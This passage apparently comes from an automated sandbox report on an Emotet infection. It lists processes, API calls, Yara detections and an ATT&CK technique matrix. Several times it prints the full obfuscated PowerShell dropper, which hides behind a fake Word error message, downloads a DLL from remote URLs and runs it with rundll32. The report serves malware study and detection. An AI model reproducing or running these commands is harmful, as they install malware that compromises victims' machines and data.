BiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJJump to behavior
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: rundll32.exe, 00000008.00000002.922961365.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,6_2_10010000
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_10011C13
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,6_2_1001106A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_10011874
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_10011C7A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,6_2_10011CB6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,6_2_1001190C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_10011980
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,6_2_10013DAF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,6_2_10014DB7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,6_2_10013DE3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_100109FC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,6_2_10009A59
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,6_2_100112C2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,6_2_10014F07
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_10013F22
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,6_2_1000C727
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_10011B52
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,6_2_1001175D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_1000E372
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information21LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
